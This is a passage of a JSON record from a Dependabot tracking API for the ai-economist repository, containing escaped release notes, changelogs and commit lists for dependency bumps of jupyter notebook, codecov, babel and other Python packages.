href=\"https://redirect.github.com/jupyter/notebook/pull/6357\"\u003e#6357\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTemporary workaround to fix js-tests related to sanitizer js loading by phantomjs \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6356\"\u003e#6356\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse place-hold.it instead of plaecehold.it to create image placeholders \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6320\"\u003e#6320\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMigrate to python 3.7+ \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6260\"\u003e#6260\u003c/a\u003e - Fixes \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6256\"\u003e#6256\u003c/a\u003e (\u003ca href=\"https://github.com/penguinolog\"\u003e\u003ccode\u003e@​penguinolog\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/graphs/contributors?from=2022-03-15\u0026amp;to=2022-04-18\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Ablink1073+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Aecharles+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Afcollonval+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​fcollonval\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Agithub-actions+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Ajtpio+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​jtpio\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Apenguinolog+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​penguinolog\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.4.8\u003c/h2\u003e\n\u003ch2\u003e6.4.8\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/compare/v6.4.7...479902d83a691253e0cff8439a33577e82408317\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix to remove potential memory leak on Jupyter Notebooks ZMQChannelHandler code \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6251\"\u003e#6251\u003c/a\u003e (\u003ca href=\"https://github.com/Vishwajeet0510\"\u003e\u003ccode\u003e@​Vishwajeet0510\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/graphs/contributors?from=2022-01-12\u0026amp;to=2022-01-25\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3AVishwajeet0510+updated%3A2022-01-12..2022-01-25\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​Vishwajeet0510\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.4.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/notebook/blob/main/CHANGELOG.md\"\u003enotebook's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eA summary of changes in the Jupyter notebook. For more detailed\ninformation, see \u003ca href=\"https://github.com/jupyter/notebook\"\u003eGitHub\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eUse \u003ccode\u003epip install notebook --upgrade\u003c/code\u003e or \u003ccode\u003econda upgrade notebook\u003c/code\u003e to\nupgrade to the latest release.\u003c/p\u003e\n\u003cp\u003eWe strongly recommend that you upgrade pip to version 9+ of pip before\nupgrading \u003ccode\u003enotebook\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eUse \u003ccode\u003epip install pip --upgrade\u003c/code\u003e to upgrade pip. Check pip version with\n\u003ccode\u003epip --version\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e7.4\u003c/h2\u003e\n\u003cp\u003eJupyter Notebook 7.4 is based on JupyterLab 4.4, and includes a number of new features, bug fixes, and enhancements for extension developers. This release is compatible with extensions supporting JupyterLab 4.0. Extension authors are recommended to consult the \u003ca href=\"https://jupyterlab.readthedocs.io/en/latest/extension/extension_migration.html#jupyterlab-4-3-to-4-4\"\u003eExtension Migration Guide\u003c/a\u003e which lists deprecations and changes to the public API.\u003c/p\u003e\n\u003cp\u003eBelow are a few highlights for this new release. Most of the new features and improvements come from the update to JupyterLab 4.4, although they may not all be supported in Notebook 7.4.\u003c/p\u003e\n\u003cp\u003eFor reference you may have a look at the \u003ca href=\"https://jupyterlab.readthedocs.io/en/latest/getting_started/changelog.html#v4-4\"\u003eJupyterLab 4.4 changelog\u003c/a\u003e to learn more.\u003c/p\u003e\n\u003ch3\u003eCode console improvements\u003c/h3\u003e\n\u003cp\u003eThe code console prompt can now be positioned on the top, left, or right side of the console,\nin addition to the default bottom placement. The placement is persisted in the Prompt Cell\nPosition setting.\u003c/p\u003e\n\u003cp\u003eThe console toolbar now includes buttons to:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eExecute code\u003c/li\u003e\n\u003cli\u003eRestart the kernel\u003c/li\u003e\n\u003cli\u003eClear the cells\u003c/li\u003e\n\u003cli\u003eSwitch the kernel\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eAdditional settings for console behavior have been added:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eClear Code Content on Execute (enabled by default) – When disabled, the code submitted for execution remains in the code editor, allowing for further edits.\u003c/li\u003e\n\u003cli\u003eHide Code Input – When enabled, only the execution output is shown in the console.\u003c/li\u003e\n\u003cli\u003eClear Cells on Execute – When enabled, only the last cell is displayed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eToggling all the three new settings transforms the console into an interactive editor\nresembling an ephemeral notebook with a single cell.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch3\u003eSettings import and export\u003c/h3\u003e\n\u003cp\u003eSettings can now be exported to \u003ccode\u003eoverrides.json\u003c/code\u003e from the Settings Editor,\nwhich can be used to pre-configure defaults in deployments or to restore settings.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/aee45355b568650cf650f4e2d3d551570655f844\"\u003e\u003ccode\u003eaee4535\u003c/code\u003e\u003c/a\u003e Release 6.4.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/a161ffac6bfff2491fe5c4e9f6111256b8b57f08\"\u003e\u003ccode\u003ea161ffa\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-v7vq-3x77-87vg\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/b79702ccdbc40a1fda5a87a3f73854e8267529e6\"\u003e\u003ccode\u003eb79702c\u003c/code\u003e\u003c/a\u003e updated error messages to not mention hidden files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/cb3dc22f0f152c1dcbcdb1aa3514748758f432a8\"\u003e\u003ccode\u003ecb3dc22\u003c/code\u003e\u003c/a\u003e Update notebook/services/contents/filemanager.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/1c3d7a60cd16deddba5b1344f5c94f967ba682d8\"\u003e\u003ccode\u003e1c3d7a6\u003c/code\u003e\u003c/a\u003e added hidden checks on handlers.py and accompanying tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/f69eb96cff7149b38bca068f4b7faaa7baf55902\"\u003e\u003ccode\u003ef69eb96\u003c/code\u003e\u003c/a\u003e added hidden checks on FileContentsManager and accompanying tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/notebook/commit/2a76184f46ed6a...\n\n_Description has been truncated_","html_url":"https://github.com/abhinavm24/ai-economist/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/abhinavm24%2Fai-economist/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.5.3","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-08-22T23:31:26.000Z","version_change":"1.5.3 → 1.11.0","issue":{"uuid":"3347073594","node_id":"PR_kwDOAT3lsM6k-MTb","number":2,"state":"open","title":"Bump the pip group across 1 directory with 11 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-22T23:31:26.000Z","updated_at":"2025-08-22T23:31:34.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":11,"packages":[{"name":"codecov","old_version":"2.0.15","new_version":"2.1.13","repository_url":"https://github.com/codecov/codecov-python"},{"name":"babel","old_version":"2.5.3","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"bleach","old_version":"2.1.3","new_version":"3.3.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"eventlet","old_version":"0.23.0","new_version":"0.35.2","repository_url":"https://github.com/eventlet/eventlet"},{"name":"flask","old_version":"1.0.2","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"future","old_version":"0.16.0","new_version":"1.0.0","repository_url":"https://github.com/PythonCharmers/python-future"},{"name":"py","old_version":"1.5.3","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"virtualenv","old_version":"15.2.0","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 8 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [codecov](https://github.com/codecov/codecov-python) | `2.0.15` | `2.1.13` |\n| [babel](https://github.com/python-babel/babel) | `2.5.3` | `2.9.1` |\n| [bleach](https://github.com/mozilla/bleach) | `2.1.3` | `3.3.0` |\n| [eventlet](https://github.com/eventlet/eventlet) | `0.23.0` | `0.35.2` |\n| [flask](https://github.com/pallets/flask) | `1.0.2` | `2.2.5` |\n| [future](https://github.com/PythonCharmers/python-future) | `0.16.0` | `1.0.0` |\n| [py](https://github.com/pytest-dev/py) | `1.5.3` | `1.11.0` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `15.2.0` | `20.26.6` |\n\n\nUpdates `codecov` from 2.0.15 to 2.1.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/codecov/codecov-python/releases\"\u003ecodecov's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.1.13\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd deprecation notice by \u003ca href=\"https://github.com/thomasrockhu-codecov\"\u003e\u003ccode\u003e@​thomasrockhu-codecov\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/325\"\u003ecodecov/codecov-python#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd migration guide link by \u003ca href=\"https://github.com/thomasrockhu-codecov\"\u003e\u003ccode\u003e@​thomasrockhu-codecov\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/327\"\u003ecodecov/codecov-python#327\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/codecov/codecov-python/compare/v2.1.12...v2.1.13\"\u003ehttps://github.com/codecov/codecov-python/compare/v2.1.12...v2.1.13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.1.12\u003c/h2\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.12\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/322\"\u003e#322\u003c/a\u003e Add Cirrus CI\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/311\"\u003e#311\u003c/a\u003e Bump coverage from 5.3 to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/312\"\u003e#312\u003c/a\u003e Bump coverage from 5.3.1 to 5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/314\"\u003e#314\u003c/a\u003e Bump coverage from 5.4 to 5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/320\"\u003e#320\u003c/a\u003e Upgrade to GitHub-native Dependabot\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.1.11\u003c/h2\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.11\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/305\"\u003e#305\u003c/a\u003e Added option to disable printing of gcov-out\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/308\"\u003e#308\u003c/a\u003e Handle exceptions that don't have a returncode\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/301\"\u003e#301\u003c/a\u003e Update to Python 3.9\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.1.10\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/148\"\u003e#148\u003c/a\u003e Output elapsed time with S3 upload\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/153\"\u003e#153\u003c/a\u003e Improve error reporting in the \u0026quot;try_run\u0026quot; function and correctly include original command output in the error message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/295\"\u003e#295\u003c/a\u003e Added sleep between upload retries.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/297\"\u003e#297\u003c/a\u003e Ignore emacs lisp files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/298\"\u003e#298\u003c/a\u003e Fix error try_to_run using | without shell=True (fix \u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/284\"\u003e#284\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies and Misc\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/290\"\u003e#290\u003c/a\u003e Bump coverage from 4.5.4 to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/291\"\u003e#291\u003c/a\u003e Update python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/292\"\u003e#292\u003c/a\u003e Add license scan report and status\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/294\"\u003e#294\u003c/a\u003e Update README with accurate links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/296\"\u003e#296\u003c/a\u003e Bump coverage from 5.2.1 to 5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.1.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/289\"\u003e#289\u003c/a\u003e Remove token restrictions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.8\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/codecov/codecov-python/blob/master/CHANGELOG.md\"\u003ecodecov's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.12\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/322\"\u003e#322\u003c/a\u003e Add Cirrus CI\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/311\"\u003e#311\u003c/a\u003e Bump coverage from 5.3 to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/312\"\u003e#312\u003c/a\u003e Bump coverage from 5.3.1 to 5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/314\"\u003e#314\u003c/a\u003e Bump coverage from 5.4 to 5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/320\"\u003e#320\u003c/a\u003e Upgrade to GitHub-native Dependabot\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.11\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/305\"\u003e#305\u003c/a\u003e Added option to disable printing of gcov-out\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/308\"\u003e#308\u003c/a\u003e Handle exceptions that don't have a returncode\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/301\"\u003e#301\u003c/a\u003e Update to Python 3.9\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.10\u003c/code\u003e\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/148\"\u003e#148\u003c/a\u003e Output elapsed time with S3 upload\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/153\"\u003e#153\u003c/a\u003e Improve error reporting in the \u0026quot;try_run\u0026quot; function and correctly include original command output in the error message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/295\"\u003e#295\u003c/a\u003e Added sleep between upload retries.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/297\"\u003e#297\u003c/a\u003e Ignore emacs lisp files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/298\"\u003e#298\u003c/a\u003e Fix error try_to_run using | without shell=True (fix \u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/284\"\u003e#284\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies and Misc\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/290\"\u003e#290\u003c/a\u003e Bump coverage from 4.5.4 to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/291\"\u003e#291\u003c/a\u003e Update python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/292\"\u003e#292\u003c/a\u003e Add license scan report and status\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/294\"\u003e#294\u003c/a\u003e Update README with accurate links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/296\"\u003e#296\u003c/a\u003e Bump coverage from 5.2.1 to 5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.9\u003c/code\u003e\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/289\"\u003e#289\u003c/a\u003eRemove token restriction as it is changed server-side\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.8\u003c/code\u003e\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/285\"\u003e#285\u003c/a\u003eAdd support for CODECOV_FLAGS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/276\"\u003e#276\u003c/a\u003eAdd ability to specify number of upload retries\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.7\u003c/code\u003e\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/codecov/codecov-python/pull/279\"\u003e#279\u003c/a\u003e Fix pinned coverage version\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003e2.1.6\u003c/code\u003e\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/a78512e4b00e67cfb3fccb530c9ca97a6c42eae5\"\u003e\u003ccode\u003ea78512e\u003c/code\u003e\u003c/a\u003e chore(release): bump to 3.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/37663707961db1092134500fe19638a5c08c52c2\"\u003e\u003ccode\u003e3766370\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/12c0dddd6350a1d511f22d363e89d9019b149164\"\u003e\u003ccode\u003e12c0ddd\u003c/code\u003e\u003c/a\u003e Add migration guide link (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/46e1b8c69923a8c6a94c8de4ec1c950c7c6cc1e8\"\u003e\u003ccode\u003e46e1b8c\u003c/code\u003e\u003c/a\u003e Add deprecation notice (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/fcff43933beb9f242e6ef0eb4c70670f4543e289\"\u003e\u003ccode\u003efcff439\u003c/code\u003e\u003c/a\u003e chore: bump to 2.1.12 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/323\"\u003e#323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/27a9833441ab179118716b86026e526919b2a0db\"\u003e\u003ccode\u003e27a9833\u003c/code\u003e\u003c/a\u003e Add Cirrus CI (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/322\"\u003e#322\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/51469b065f0e16d4bedf121552b5e1eb58e18125\"\u003e\u003ccode\u003e51469b0\u003c/code\u003e\u003c/a\u003e Upgrade to GitHub-native Dependabot (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/320\"\u003e#320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/158a38eed7fd6f0d2f9c9f4c5258ab1f244b6e13\"\u003e\u003ccode\u003e158a38e\u003c/code\u003e\u003c/a\u003e Bump coverage from 5.4 to 5.5 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/26fe18b0e7019e3415f1df525fbe4dfb72057714\"\u003e\u003ccode\u003e26fe18b\u003c/code\u003e\u003c/a\u003e Bump coverage from 5.3.1 to 5.4 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/312\"\u003e#312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codecov/codecov-python/commit/147802d7403db0c21b81820ba9a8619b8d398b2b\"\u003e\u003ccode\u003e147802d\u003c/code\u003e\u003c/a\u003e Bump coverage from 5.3 to 5.3.1 (\u003ca href=\"https://redirect.github.com/codecov/codecov-python/issues/311\"\u003e#311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/codecov/codecov-python/compare/v2.0.15...v2.1.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.5.3 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca 